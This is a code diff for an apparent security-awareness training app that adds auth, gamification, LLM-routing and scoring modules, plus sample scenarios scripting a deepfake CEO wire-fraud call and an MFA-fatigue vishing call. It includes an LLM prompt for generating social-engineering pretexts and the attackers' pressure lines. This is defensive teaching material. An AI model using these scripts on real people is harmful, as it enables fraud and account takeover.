timedelta(hours=JWT_EXPIRATION_HOURS) + payload = {"user_id": user_id, "exp": expiration} + return jwt.encode(payload, JWT_SECRET, algorithm=JWT_ALGORITHM) + + +async def get_current_user( + credentials: HTTPAuthorizationCredentials = Depends(security), +) -> User: + try: + token = credentials.credentials + payload = jwt.decode(token, JWT_SECRET, algorithms=[JWT_ALGORITHM]) + user_id = payload.get("user_id") + + user_doc = await db.users.find_one({"id": user_id}, {"_id": 0}) + if not user_doc: + raise HTTPException(status_code=401, detail="User not found") + + return User(**user_doc) + except jwt.ExpiredSignatureError: + raise HTTPException(status_code=401, detail="Token expired") + except HTTPException: + raise + except Exception: + raise HTTPException(status_code=401, detail="Invalid token") diff --git a/backend/services/database.py b/backend/services/database.py new file mode 100644 index 0000000..185f893 --- /dev/null +++ b/backend/services/database.py @@ -0,0 +1,10 @@ +import os + +from dotenv import load_dotenv +from motor.motor_asyncio import AsyncIOMotorClient + +load_dotenv() + +mongo_url = os.environ["MONGO_URL"] +client = AsyncIOMotorClient(mongo_url) +db = client[os.environ["DB_NAME"]] diff --git a/backend/services/gamification.py b/backend/services/gamification.py new file mode 100644 index 0000000..4d83ecd --- /dev/null +++ b/backend/services/gamification.py @@ -0,0 +1,276 @@ +import logging +from datetime import UTC, datetime + +from services.database import db + +logger = logging.getLogger(__name__) + +# XP thresholds per level +LEVEL_THRESHOLDS = [0, 100, 300, 600, 1000, 1500, 2200, 3000, 4000, 5500, 7500, 10000] + +# Badge definitions +BADGE_DEFINITIONS = [ + { + "id": "first_blood", + "name": "First Blood", + "description": "Complete your first simulation", + "icon": "Sword", + "condition": "complete_1_simulation", + "xp_reward": 50, + }, + { + "id": "phishing_detector", + "name": "Phishing Detector", + "description": "Score 80%+ on 3 phishing scenarios", + "icon": "Shield", + "condition": "phishing_score_80_x3", + "xp_reward": 100, + }, + { + "id": "social_proof_immune", + "name": "Social Proof Immune", + "description": "Resist all social proof attacks", + "icon": "Users", + "condition": "resist_social_proof_x3", + "xp_reward": 100, + }, + { + "id": "authority_challenger", + "name": "Authority Challenger", + "description": "Score 90%+ on authority-based attacks", + "icon": "Crown", + "condition": "authority_score_90", + "xp_reward": 150, + }, + { + "id": "streak_3", + "name": "On Fire", + "description": "Maintain a 3-day streak", + "icon": "Flame", + "condition": "streak_3", + "xp_reward": 75, + }, + { + "id": "streak_7", + "name": "Unstoppable", + "description": "Maintain a 7-day streak", + "icon": "Zap", + "condition": "streak_7", + "xp_reward": 150, + }, + { + "id": "streak_30", + "name": "Iron Will", + "description": "Maintain a 30-day streak", + "icon": "Trophy", + "condition": "streak_30", + "xp_reward": 500, + }, + { + "id": "quiz_master", + "name": "Quiz Master", + "description": "Score 100% on 5 quizzes", + "icon": "BookCheck", + "condition": "quiz_perfect_x5", + "xp_reward": 200, + }, + { + "id": "all_categories", + "name": "Cialdini Scholar", + "description": "Complete scenarios in all 6 categories", + "icon": "Brain", + "condition": "all_cialdini_categories", + "xp_reward": 300, + }, + { + "id": "campaign_hero", + "name": "Campaign Hero", + "description": "Complete a campaign with 80%+ avg score", + "icon": "Flag", + "condition": "campaign_complete_80", + "xp_reward": 250, + }, + { + "id": "team_player", + "name": "Team Player", + "description": "Join an organization", + "icon": "Users2", + "condition": "join_organization", + "xp_reward": 50, + }, + { + "id": "scenario_creator", + "name": "Scenario Creator", + "description": "Publish a custom scenario", + "icon": "Pencil", + "condition": "publish_scenario", + "xp_reward": 200, + }, +] + + +def calculate_level(xp: int) -> int: + """Calculate level from XP.""" + for i in range(len(LEVEL_THRESHOLDS) - 1, -1, -1): + if xp >= LEVEL_THRESHOLDS[i]: + return i + 1 + return 1 + + +def xp_for_next_level(current_xp: int) -> dict: + """Get XP progress to next level.""" + level = calculate_level(current_xp) + if level >= len(LEVEL_THRESHOLDS): + return {"current": current_xp, "next_level_xp": current_xp, "progress": 100} + + current_threshold = LEVEL_THRESHOLDS[level - 1] + next_threshold = LEVEL_THRESHOLDS[level] if level < len(LEVEL_THRESHOLDS) else current_xp + progress = ((current_xp - current_threshold) / (next_threshold - current_threshold)) * 100 + + return { + "current_xp": current_xp, + "level": level, + "current_threshold": current_threshold, + "next_threshold": next_threshold, + "progress": round(min(progress, 100), 1), + } + + +async def award_xp(user_id: str, xp_amount: int, check_streak: bool = False) -> dict: + """Award XP to user and check for level ups and badges.""" + user = await db.users.find_one({"id": user_id}, {"_id": 0}) + if not user: + return {} + + now = datetime.now(UTC) + updates = {} + new_badges = [] + + # Streak logic + if check_streak: + last_active = user.get("last_active") + streak = user.get("streak_days", 0) + + if last_active: + if isinstance(last_active, str): + last_active = datetime.fromisoformat(last_active.replace("Z", "+00:00")) + days_diff = (now.date() - last_active.date()).days + + if days_diff == 1: + streak += 1 + elif days_diff > 1: + streak = 1 + # Same day = no change + else: + streak = 1 + + updates["streak_days"] = streak + updates["last_active"] = now.isoformat() + + # Streak badges + if streak >= 3 and "streak_3" not in user.get("badges", []): + new_badges.append("streak_3") + xp_amount += 75 + if streak >= 7 and "streak_7" not in user.get("badges", []): + new_badges.append("streak_7") + xp_amount += 150 + if streak >= 30 and "streak_30" not in user.get("badges", []): + new_badges.append("streak_30") + xp_amount += 500 + + # Update XP + new_xp = user.get("xp", 0) + xp_amount + new_level = calculate_level(new_xp) + updates["xp"] = new_xp + updates["level"] = new_level + + # Apply badge updates + if new_badges: + await db.users.update_one( + {"id": user_id}, + {"$addToSet": {"badges": {"$each": new_badges}}}, + ) + + await db.users.update_one({"id": user_id}, {"$set": updates}) + + # Create notifications for new badges + for badge_id in new_badges: + badge_def = next((b for b in BADGE_DEFINITIONS if b["id"] == badge_id), None) + if badge_def: + await db.notifications.insert_one( + { + "id": str(__import__("uuid").uuid4()), + "user_id": user_id, + "title": f"Badge Earned: {badge_def['name']}", + "message": badge_def["description"], + "type": "achievement", + "read": False, + "created_at": now.isoformat(), + } + ) + + leveled_up = new_level > user.get("level", 1) + if leveled_up: + await db.notifications.insert_one( + { + "id": str(__import__("uuid").uuid4()), + "user_id": user_id, + "title": f"Level Up! You're now Level {new_level}", + "message": f"Keep training to reach Level {new_level + 1}!", + "type": "achievement", + "read": False, + "created_at": now.isoformat(), + } + ) + + return { + "xp_earned": xp_amount, + "total_xp": new_xp, + "level": new_level, + "leveled_up": leveled_up, + "new_badges": new_badges, + } + + +async def check_simulation_badges(user_id: str): + """Check and award badges based on simulation history.""" + user = await db.users.find_one({"id": user_id}, {"_id": 0}) + if not user: + return + + existing_badges = user.get("badges", []) + sims = await db.simulations.find( + {"user_id": user_id, "status": "completed"}, {"_id": 0} + ).to_list(1000) + + new_badges = [] + total_xp = 0 + + # First Blood + if "first_blood" not in existing_badges and len(sims) >= 1: + new_badges.append("first_blood") + total_xp += 50 + + # Quiz Master: 5 perfect quiz scores + quiz_sims = [s for s in sims if s.get("simulation_type") == "quiz" and s.get("score", 0) == 100] + if "quiz_master" not in existing_badges and len(quiz_sims) >= 5: + new_badges.append("quiz_master") + total_xp += 200 + + # All Cialdini categories + all_categories = set() + for s in sims: + cats = s.get("challenge_data", {}).get("cialdini_categories", []) + all_categories.update(cats) + cialdini_6 = {"reciprocity", "scarcity", "authority", "commitment", "liking", "social_proof"} + if "all_categories" not in existing_badges and cialdini_6.issubset(all_categories): + new_badges.append("all_categories") + total_xp += 300 + + if new_badges: + await db.users.update_one( + {"id": user_id}, + {"$addToSet": {"badges": {"$each": new_badges}}}, + ) + if total_xp > 0: + await award_xp(user_id, total_xp) diff --git a/backend/services/llm.py b/backend/services/llm.py new file mode 100644 index 0000000..dce4f43 --- /dev/null +++ b/backend/services/llm.py @@ -0,0 +1,354 @@ +import asyncio +import json +import logging +import re +from typing import Any + +from langchain_core.messages import HumanMessage, SystemMessage + +logger = logging.getLogger(__name__) + +# ==================== MODEL CATALOG ==================== +# Provider -> list of { id, name, context, free? } + +PROVIDER_MODELS = { + "groq": [ + {"id": "llama-3.3-70b-versatile", "name": "Llama 3.3 70B", "context": 128000}, + {"id": "llama-3.1-8b-instant", "name": "Llama 3.1 8B Instant", "context": 128000}, + {"id": "llama3-70b-8192", "name": "Llama 3 70B", "context": 8192}, + {"id": "llama3-8b-8192", "name": "Llama 3 8B", "context": 8192}, + {"id": "gemma2-9b-it", "name": "Gemma 2 9B", "context": 8192}, + {"id": "mixtral-8x7b-32768", "name": "Mixtral 8x7B", "context": 32768}, + ], + "gemini": [ + {"id": "gemini-2.0-flash", "name": "Gemini 2.0 Flash", "context": 1000000}, + {"id": "gemini-1.5-flash", "name": "Gemini 1.5 Flash", "context": 1000000}, + {"id": "gemini-1.5-pro", "name": "Gemini 1.5 Pro", "context": 2000000}, + {"id": "gemini-pro", "name": "Gemini Pro (Legacy)", "context": 32000}, + ], + "claude": [ + {"id": "claude-sonnet-4-20250514", "name": "Claude Sonnet 4", "context": 200000}, + {"id": "claude-3-5-sonnet-20241022", "name": "Claude 3.5 Sonnet", "context": 200000}, + {"id": "claude-3-5-haiku-20241022", "name": "Claude 3.5 Haiku", "context": 200000}, + {"id": "claude-3-haiku-20240307", "name": "Claude 3 Haiku", "context": 200000}, + ], + "openai": [ + {"id": "gpt-4o", "name": "GPT-4o", "context": 128000}, + {"id": "gpt-4o-mini", "name": "GPT-4o Mini", "context": 128000}, + {"id": "gpt-4-turbo", "name": "GPT-4 Turbo", "context": 128000}, + {"id": "gpt-3.5-turbo", "name": "GPT-3.5 Turbo", "context": 16385}, + ], + "openrouter": [ + { + "id": "meta-llama/llama-3.3-70b-instruct", + "name": "Llama 3.3 70B Instruct", + "context": 128000, + }, + { + "id": "meta-llama/llama-3.1-405b-instruct", + "name": "Llama 3.1 405B Instruct", + "context": 128000, + }, + { + "id": "meta-llama/llama-3.1-8b-instruct:free", + "name": "Llama 3.1 8B (Free)", + "context": 128000, + "free": True, + }, + { + "id": "google/gemini-2.0-flash-exp:free", + "name": "Gemini 2.0 Flash (Free)", + "context": 1000000, + "free": True, + }, + {"id": "google/gemini-pro-1.5", "name": "Gemini Pro 1.5", "context": 2000000}, + {"id": "anthropic/claude-3.5-sonnet", "name": "Claude 3.5 Sonnet", "context": 200000}, + {"id": "anthropic/claude-3.5-haiku", "name": "Claude 3.5 Haiku", "context": 200000}, + {"id": "openai/gpt-4o", "name": "GPT-4o", "context": 128000}, + {"id": "openai/gpt-4o-mini", "name": "GPT-4o Mini", "context": 128000}, + {"id": "mistralai/mistral-large-latest", "name": "Mistral Large", "context": 128000}, + {"id": "mistralai/mixtral-8x22b-instruct", "name": "Mixtral 8x22B", "context": 65536}, + {"id": "qwen/qwen-2.5-72b-instruct", "name": "Qwen 2.5 72B", "context": 128000}, + {"id": "deepseek/deepseek-chat", "name": "DeepSeek V3", "context": 128000}, + {"id": "deepseek/deepseek-r1", "name": "DeepSeek R1", "context": 64000}, + {"id": "nousresearch/hermes-3-llama-3.1-405b", "name": "Hermes 3 405B", "context": 128000}, + { + "id": "microsoft/phi-3-medium-128k-instruct", + "name": "Phi 3 Medium 128K", + "context": 128000, + }, + ], + "local": [ + {"id": "custom", "name": "Custom Model (enter below)", "context": 0}, + ], +} + +MODEL_DEFAULTS = { + "groq": "llama-3.3-70b-versatile", + "gemini": "gemini-2.0-flash", + "claude": "claude-3-5-sonnet-20241022", + "openai": "gpt-4o-mini", + "openrouter": "meta-llama/llama-3.1-8b-instruct:free", + "local": "llama3", +} + +GEMINI_FALLBACK_MODELS = [ + "gemini-2.0-flash", + "gemini-1.5-flash", + "models/gemini-1.5-flash", + "gemini-pro", +] + +# OpenRouter base URL +OPENROUTER_BASE_URL = "https://openrouter.ai/api/v1" + +# Default local endpoints +LOCAL_DEFAULTS = { + "ollama": "http://localhost:11434/v1", + "lm_studio": "http://localhost:1234/v1", + "llamacpp": "http://localhost:8080/v1", +} + + +def sanitize_llm_output(text: str) -> str: + """Remove markdown code blocks and training markers from LLM output.""" + text = re.sub(r"```(?:json)?", "", text) + text = text.replace("```", "") + text = text.replace("[TRAINING]", "").replace("[TRAINING MATERIAL]", "") + return text.strip() + + +def repair_json(text: str) -> str: + """Attempt to repair and extract valid JSON from LLM output.""" + text = sanitize_llm_output(text) + + start = text.find("{") + end = text.rfind("}") + + if start != -1 and end != -1: + text = text[start : end + 1] + + try: + json.loads(text) + return text + except json.JSONDecodeError: + pass + + return text + + +def get_provider_models(provider: str) -> list: + """Return the model catalog for a given provider.""" + return PROVIDER_MODELS.get(provider, []) + + +# ==================== PROVIDER INVOCATIONS ==================== + + +async def _invoke_openai_compatible( + api_key: str, + model_name: str, + messages: list, + base_url: str = None, + temperature: float = 0.7, + extra_headers: dict = None, +): + """Generic OpenAI-compatible invocation (works for OpenAI, OpenRouter, Local LLMs).""" + from langchain_openai import ChatOpenAI + + kwargs = { + "api_key": api_key or "not-needed", + "model": model_name, + "temperature": temperature, + } + if base_url: + kwargs["base_url"] = base_url + if extra_headers: + kwargs["default_headers"] = extra_headers + + chat = ChatOpenAI(**kwargs) + return await asyncio.wait_for(chat.ainvoke(messages), timeout=30.0) + + +async def _invoke_gemini(api_key: str, model_name: str, messages: list, temperature: float = 0.7): + """Invoke Gemini with fallback model strategy.""" + from langchain_google_genai import ChatGoogleGenerativeAI + + model_candidates = [model_name] + GEMINI_FALLBACK_MODELS + model_candidates = list(dict.fromkeys(model_candidates)) + + last_error = None + for candidate in model_candidates: + try: + logger.info(f"Attempting Gemini with model: {candidate}") + convert_system = "1.5" not in candidate and "2.0" not in candidate + chat = ChatGoogleGenerativeAI( + google_api_key=api_key, + model=candidate, + temperature=temperature, + convert_system_message_to_human=convert_system, + ) + response = await asyncio.wait_for(chat.ainvoke(messages), timeout=15.0) + if response: + logger.info(f"Success with model: {candidate}") + return response + except TimeoutError: + logger.warning(f"Timeout with model {candidate}") + last_error = Exception(f"Request timed out for {candidate}") + except Exception as e: + logger.warning(f"Failed with model {candidate}: {e}") + last_error = e + + raise last_error or Exception("All Gemini models failed") + + +async def _invoke_provider(config: dict[str, Any], messages: list, temperature: float = 0.7): + """Route to the correct provider invocation.""" + provider = config["provider"] + api_key = config.get("api_key", "") + model_name = config.get("model_name") or MODEL_DEFAULTS.get(provider) + base_url = config.get("base_url") + + if provider == "groq": + from langchain_groq import ChatGroq + + chat = ChatGroq(api_key=api_key, model_name=model_name, temperature=temperature) + return await asyncio.wait_for(chat.ainvoke(messages), timeout=15.0) + + elif provider == "gemini": + return await _invoke_gemini(api_key, model_name, messages, temperature) + + elif provider == "claude": + from langchain_anthropic import ChatAnthropic + + chat = ChatAnthropic(api_key=api_key, model=model_name, temperature=temperature) + return await asyncio.wait_for(chat.ainvoke(messages), timeout=30.0) + + elif provider == "openai": + return await _invoke_openai_compatible( + api_key, + model_name, + messages, + temperature=temperature, + ) + + elif provider == "openrouter": + return await _invoke_openai_compatible( + api_key=api_key, + model_name=model_name, + messages=messages, + base_url=OPENROUTER_BASE_URL, + temperature=temperature, + extra_headers={ + "HTTP-Referer": "https://github.com/fdciabdul/Pretexta", + "X-Title": "Pretexta", + }, + ) + + elif provider == "local": + # Local LLM: Ollama, LM Studio, llama.cpp, etc. + endpoint = base_url or LOCAL_DEFAULTS["ollama"] + return await _invoke_openai_compatible( + api_key=api_key or "not-needed", + model_name=model_name or "llama3", + messages=messages, + base_url=endpoint, + temperature=temperature, + ) + + else: + raise ValueError(f"Unsupported provider: {provider}") + + +# ==================== PUBLIC API ==================== + + +async def get_llm_generate_model(config: dict[str, Any], prompt: str, context: dict[str, Any]): + """Generate pretext content using configured LLM provider.""" + context_str = json.dumps(context, indent=2) if isinstance(context, dict) else str(context) + system_message = SystemMessage( + content=( + "You are a social engineering pretext generator. Generate realistic, " + "ethically-sound pretexts for security awareness training. Always mark " + "outputs as training material.\n\nContext: " + context_str + "\n\n" + ) + ) + user_message = HumanMessage(content=prompt) + messages = [system_message, user_message] + + return await _invoke_provider(config, messages) + + +async def get_llm_chat_model(config: dict[str, Any], messages: list): + """Chat interaction using configured LLM provider.""" + return await _invoke_provider(config, messages, temperature=0.8) + + +async def fetch_local_models(base_url: str) -> list: + """Fetch available models from a local Ollama/LM Studio instance.""" + import httpx + + # Try Ollama API format + try: + async with httpx.AsyncClient(timeout=5) as client: + # Ollama native API + response = await client.get(f"{base_url.rstrip('/v1').rstrip('/')}/api/tags") + if response.status_code == 200: + data = response.json() + return [ + {"id": m["name"], "name": m["name"], "context": 0, "local": True} + for m in data.get("models", []) + ] + except Exception: + pass + + # Try OpenAI-compatible /models endpoint + try: + async with httpx.AsyncClient(timeout=5) as client: + response = await client.get(f"{base_url.rstrip('/')}/models") + if response.status_code == 200: + data = response.json() + return [ + {"id": m["id"], "name": m.get("id", "unknown"), "context": 0, "local": True} + for m in data.get("data", []) + ] + except Exception: + pass + + return [] + + +async def fetch_openrouter_models(api_key: str) -> list: + """Fetch available models from OpenRouter API.""" + import httpx + + try: + async with httpx.AsyncClient(timeout=10) as client: + response = await client.get( + "https://openrouter.ai/api/v1/models", + headers={"Authorization": f"Bearer {api_key}"} if api_key else {}, + ) + if response.status_code == 200: + data = response.json() + models = [] + for m in data.get("data", []): + models.append( + { + "id": m["id"], + "name": m.get("name", m["id"]), + "context": m.get("context_length", 0), + "pricing": m.get("pricing", {}), + } + ) + # Sort: free models first, then by name + models.sort( + key=lambda x: ( + not (x.get("pricing", {}).get("prompt", "1") == "0"), + x["name"], + ) + ) + return models + except Exception as e: + logger.warning(f"Failed to fetch OpenRouter models: {e}") + + return [] diff --git a/backend/services/scoring.py b/backend/services/scoring.py new file mode 100644 index 0000000..de1f3dc --- /dev/null +++ b/backend/services/scoring.py @@ -0,0 +1,24 @@ +from typing import Any + + +def calculate_susceptibility_score(simulation: dict[str, Any]) -> dict[str, Any]: + """Calculate susceptibility score 0-100. Lower = more susceptible.""" + events = simulation.get("events", []) + + if not events: + return {"total": 0, "breakdown": {}} + + compliance_count = sum(1 for e in events if e.get("action") == "complied") + total_events = len(events) + + base_score = max(0, 100 - (compliance_count / total_events * 100)) if total_events > 0 else 50 + + return { + "total": round(base_score, 2), + "breakdown": { + "compliance_rate": round( + (compliance_count / total_events * 100) if total_events > 0 else 0, 2 + ), + "total_events": total_events, + }, + } diff --git a/data/sample/2025-01-12-deepfake-video-call.yaml b/data/sample/2025-01-12-deepfake-video-call.yaml new file mode 100644 index 0000000..f477754 --- /dev/null +++ b/data/sample/2025-01-12-deepfake-video-call.yaml @@ -0,0 +1,162 @@ +type: challenge +title: "Deepfake CEO Video Call" +description: "Your CEO joins an evening video call about a confidential acquisition. But something feels off." +difficulty: hard +cialdini_categories: + - authority + - urgency + - commitment +estimated_time: 15 +metadata: + author: "Pretexta" + tags: [deepfake, video-call, bec, wire-fraud, ai-attack] + +nodes: + - id: start + type: message + channel: chat + content_en: + from: "CEO (Video Call)" + body: "Hey, glad I caught you online. Remember that acquisition we discussed at the board meeting? It's accelerating. I need you to authorize a wire transfer before midnight. The lawyers are waiting." + content_id: + from: "CEO (Video Call)" + body: "Hei, senang bisa ketemu kamu online. Ingat akuisisi yang kita bahas di rapat direksi? Prosesnya dipercepat. Saya butuh kamu otorisasi transfer wire sebelum tengah malam. Tim legal sudah menunggu." + next: choice_1 + + - id: choice_1 + type: question + content_en: + text: "The CEO looks and sounds real on video, but the request is unusual. What do you do?" + content_id: + text: "CEO terlihat dan terdengar nyata di video, tapi permintaannya tidak biasa. Apa yang kamu lakukan?" + options: + - text: "Process the transfer โ€” the CEO asked directly on video" + text_id: "Proses transfer โ€” CEO langsung meminta via video" + next: bad_outcome_immediate + score_impact: -50 + - text: "Ask the CEO a personal question only the real CEO would know" + text_id: "Ajukan pertanyaan pribadi yang hanya CEO asli yang tahu" + next: verify_identity + score_impact: 15 + - text: "Say you'll handle it, but first verify through the CEO's executive assistant via a separate channel" + text_id: "Bilang akan diurus, tapi verifikasi dulu lewat asisten eksekutif CEO via channel terpisah" + next: good_outcome_oob + score_impact: 30 + + - id: verify_identity + type: message + channel: chat + content_en: + from: "CEO (Video Call)" + body: "Come on, you're really going to quiz me? *laughs* Fine... look, the connection is getting bad. I have to jump to another call with the lawyers in Frankfurt in 3 minutes. Can you just process this? I'll send you formal confirmation tomorrow morning." + content_id: + from: "CEO (Video Call)" + body: "Ayolah, kamu mau mengkuis saya? *tertawa* Baik... lihat, koneksinya mulai jelek. Saya harus masuk call lain dengan pengacara di Frankfurt 3 menit lagi. Bisa langsung proses? Saya kirim konfirmasi formal besok pagi." + next: choice_2 + + - id: choice_2 + type: question + content_en: + text: "The CEO evaded your verification question and is pressuring you with time constraints. The video quality seems to be deteriorating. What now?" + content_id: + text: "CEO menghindari pertanyaan verifikasi dan menekan dengan batasan waktu. Kualitas video tampak menurun. Sekarang apa?" + options: + - text: "Process the transfer โ€” you don't want to upset the CEO" + text_id: "Proses transfer โ€” kamu tidak mau membuat CEO marah" + next: bad_outcome_pressured + score_impact: -40 + - text: "Insist on verification: 'I understand it's urgent, but policy requires dual authorization for transfers over $10K'" + text_id: "Tetap minta verifikasi: 'Saya paham ini urgent, tapi kebijakan memerlukan otorisasi ganda untuk transfer di atas $10K'" + next: escalation + score_impact: 20 + - text: "End the call and immediately contact the CEO through their known personal phone number" + text_id: "Akhiri panggilan dan langsung hubungi CEO melalui nomor telepon pribadi yang sudah dikenal" + next: good_outcome_verify + score_impact: 40 + + - id: escalation + type: message + channel: chat + content_en: + from: "CEO (Video Call)" + body: "Dual authorization? For crying out loud... this is a CONFIDENTIAL deal. The fewer people who know, the better. Are you going to be the one who killed this deal because of paperwork? I'm deeply disappointed. This will be noted." + content_id: + from: "CEO (Video Call)" + body: "Otorisasi ganda? Ya ampun... ini RAHASIA. Semakin sedikit yang tahu, semakin baik. Kamu mau jadi orang yang menghancurkan deal ini karena birokrasi? Saya sangat kecewa. Ini akan dicatat." + next: choice_3 + + - id: choice_3 + type: question + content_en: + text: "The CEO is now threatening your career. The pressure is intense. But deepfakes can replicate facial expressions and voice patterns. What's your final decision?" + content_id: + text: "CEO sekarang mengancam karirmu. Tekanannya intens. Tapi deepfake bisa mereplikasi ekspresi wajah dan pola suara. Apa keputusan akhirmu?" + options: + - text: "Give in and process the transfer to save your career" + text_id: "Menyerah dan proses transfer untuk menyelamatkan karir" + next: bad_outcome_career_threat + score_impact: -100 + - text: "Stand firm: 'I'm following protocol. If you're really the CEO, you'd appreciate that I'm protecting company assets.'" + text_id: "Tetap teguh: 'Saya mengikuti prosedur. Jika Anda benar-benar CEO, Anda akan menghargai bahwa saya melindungi aset perusahaan.'" + next: good_outcome_stood_firm + score_impact: 50 + + - id: bad_outcome_immediate + type: end + result: failure + content_en: + title: "Compromised โ€” Deepfake Successful" + explanation: "You authorized a wire transfer based solely on a video call. The 'CEO' was an AI-generated deepfake. Modern deepfake technology can recreate realistic video and voice in real-time. Always verify large financial requests through independent, out-of-band channels โ€” never trust video alone." + content_id: + title: "Terkompromi โ€” Deepfake Berhasil" + explanation: "Kamu mengotorisasi transfer wire hanya berdasarkan video call. 'CEO' tersebut adalah deepfake buatan AI. Teknologi deepfake modern bisa membuat video dan suara realistis secara real-time. Selalu verifikasi permintaan finansial besar melalui channel independen โ€” jangan pernah percaya video saja." + + - id: bad_outcome_pressured + type: end + result: failure + content_en: + title: "Compromised โ€” Pressure Tactics Worked" + explanation: "Despite initial suspicion, you gave in to time pressure. The deepfake evaded your verification attempt by creating artificial urgency. Key lesson: if someone avoids verification AND creates urgency, that's a double red flag." + content_id: + title: "Terkompromi โ€” Taktik Tekanan Berhasil" + explanation: "Meskipun awalnya curiga, kamu menyerah pada tekanan waktu. Deepfake menghindari upaya verifikasi dengan menciptakan urgensi buatan. Pelajaran: jika seseorang menghindari verifikasi DAN menciptakan urgensi, itu adalah dua tanda bahaya." + + - id: bad_outcome_career_threat + type: end + result: failure + content_en: + title: "Compromised โ€” Career Threat Effective" + explanation: "The attacker used escalating emotional pressure: urgency โ†’ authority โ†’ career threats. This is a classic manipulation cascade. A real CEO who values security would NEVER threaten an employee for following security protocols. The threat itself was the biggest red flag." + content_id: + title: "Terkompromi โ€” Ancaman Karir Efektif" + explanation: "Penyerang menggunakan tekanan emosional bertingkat: urgensi โ†’ otoritas โ†’ ancaman karir. Ini adalah kaskade manipulasi klasik. CEO asli yang menghargai keamanan TIDAK AKAN pernah mengancam karyawan karena mengikuti protokol keamanan. Ancaman itu sendiri adalah tanda bahaya terbesar." + + - id: good_outcome_oob + type: end + result: success + content_en: + title: "Defended โ€” Out-of-Band Verification" + explanation: "Excellent! You recognized that even video calls can be faked and chose to verify through a completely separate channel. The executive assistant confirmed the CEO was on vacation โ€” no acquisition was in progress. This is the gold standard response to suspicious executive requests." + content_id: + title: "Berhasil Bertahan โ€” Verifikasi Out-of-Band" + explanation: "Luar biasa! Kamu menyadari bahwa bahkan video call bisa dipalsukan dan memilih verifikasi melalui channel yang sepenuhnya terpisah. Asisten eksekutif mengonfirmasi CEO sedang liburan โ€” tidak ada akuisisi yang berlangsung. Ini adalah respons standar emas untuk permintaan eksekutif mencurigakan." + + - id: good_outcome_verify + type: end + result: success + content_en: + title: "Defended โ€” Direct Verification" + explanation: "Smart move. You ended the suspicious call and contacted the CEO through a known, trusted channel. The real CEO confirmed they never made that call. You successfully identified a deepfake attack. Always verify through channels YOU initiate, not ones provided by the caller." + content_id: + title: "Berhasil Bertahan โ€” Verifikasi Langsung" + explanation: "Langkah cerdas. Kamu mengakhiri panggilan mencurigakan dan menghubungi CEO melalui channel yang dikenal dan terpercaya. CEO asli mengonfirmasi tidak pernah melakukan panggilan itu. Kamu berhasil mengidentifikasi serangan deepfake. Selalu verifikasi melalui channel yang KAMU inisiasi." + + - id: good_outcome_stood_firm + type: end + result: success + content_en: + title: "Defended โ€” Unbreakable Protocol" + explanation: "Outstanding resilience. You withstood three levels of social engineering: urgency, authority, and career threats. Your response was textbook perfect โ€” a legitimate executive would NEVER punish an employee for following security protocols. The deepfake revealed itself through its aggressive response to verification." + content_id: + title: "Berhasil Bertahan โ€” Protokol Tak Tergoyahkan" + explanation: "Ketahanan luar biasa. Kamu bertahan dari tiga level social engineering: urgensi, otoritas, dan ancaman karir. Respons kamu sempurna โ€” eksekutif yang sah TIDAK AKAN pernah menghukum karyawan karena mengikuti protokol keamanan. Deepfake mengungkap dirinya melalui respons agresif terhadap verifikasi." diff --git a/data/sample/2025-01-13-mfa-fatigue.yaml b/data/sample/2025-01-13-mfa-fatigue.yaml new file mode 100644 index 0000000..c65bc2d --- /dev/null +++ b/data/sample/2025-01-13-mfa-fatigue.yaml @@ -0,0 +1,148 @@ +type: challenge +title: "MFA Fatigue Attack" +description: "Your phone won't stop buzzing with login approval requests. Then 'IT Security' calls." +difficulty: hard +cialdini_categories: + - authority + - urgency + - social_proof +estimated_time: 12 +metadata: + author: "Pretexta" + tags: [mfa, account-takeover, push-notification, fatigue-attack] + +nodes: + - id: start + type: message + channel: narrator + content_en: + text: "It's 11:30 PM. Your phone buzzes. And again. And again. You've received 14 MFA push notifications in the last 3 minutes, all asking you to 'Approve Login'. Then your phone rings." + content_id: + text: "Jam 11:30 malam. Handphone-mu bergetar. Dan lagi. Dan lagi. Kamu sudah menerima 14 notifikasi push MFA dalam 3 menit terakhir, semua meminta 'Setujui Login'. Lalu teleponmu berdering." + next: soc_call + + - id: soc_call + type: message + channel: phone_call + content_en: + caller: "IT Security Operations Center" + transcript: "Hi, this is Mike from the Security Operations Center. We've detected an active brute-force attack on your account. The push notifications you're receiving are from the attacker. We need you to approve the NEXT push โ€” that's our security team deploying a lockdown on your account. After that, deny everything else." + content_id: + caller: "Pusat Operasi Keamanan IT" + transcript: "Halo, ini Mike dari Pusat Operasi Keamanan. Kami mendeteksi serangan brute-force aktif pada akun Anda. Notifikasi push yang Anda terima berasal dari penyerang. Kami butuh Anda untuk menyetujui push BERIKUTNYA โ€” itu tim keamanan kami melakukan lockdown akun Anda. Setelah itu, tolak semuanya." + next: choice_1 + + - id: choice_1 + type: question + content_en: + text: "Someone claiming to be from the SOC wants you to approve the next MFA push notification. The notifications are still flooding your phone. What do you do?" + content_id: + text: "Seseorang yang mengaku dari SOC ingin kamu menyetujui notifikasi MFA push berikutnya. Notifikasi masih membanjiri handphone-mu. Apa yang kamu lakukan?" + options: + - text: "Approve the next push notification as instructed" + text_id: "Setujui notifikasi push berikutnya sesuai instruksi" + next: bad_outcome_approved + score_impact: -50 + - text: "Ask the caller for their employee ID and extension number" + text_id: "Minta ID karyawan dan nomor ekstensi penelepon" + next: verify_caller + score_impact: 10 + - text: "Hang up and call the IT helpdesk number from the company intranet directly" + text_id: "Tutup telepon dan hubungi nomor helpdesk IT dari intranet perusahaan langsung" + next: good_outcome_direct + score_impact: 40 + - text: "Deny all push notifications and disable MFA temporarily on your phone" + text_id: "Tolak semua notifikasi push dan nonaktifkan MFA sementara di handphone" + next: partial_outcome + score_impact: 5 + + - id: verify_caller + type: message + channel: phone_call + content_en: + caller: "IT Security Operations Center" + transcript: "My badge number is SOC-4471. Look, every second you wait, the attacker is trying more passwords. Your account WILL be compromised if we don't act NOW. Just approve the next push. You can verify me with my manager Sarah Chen after we lock this down. We're trying to help you." + content_id: + caller: "Pusat Operasi Keamanan IT" + transcript: "Nomor badge saya SOC-4471. Dengar, setiap detik kamu menunggu, penyerang mencoba lebih banyak password. Akun kamu AKAN dikompromikan jika kita tidak bertindak SEKARANG. Setujui saja push berikutnya. Kamu bisa verifikasi saya dengan manajer saya Sarah Chen setelah kita amankan ini." + next: choice_2 + + - id: choice_2 + type: question + content_en: + text: "The caller gave a badge number and their manager's name. They sound professional and urgent. The notifications keep coming. What's your move?" + content_id: + text: "Penelepon memberikan nomor badge dan nama manajernya. Mereka terdengar profesional dan urgent. Notifikasi terus berdatangan. Apa langkahmu?" + options: + - text: "This sounds legitimate 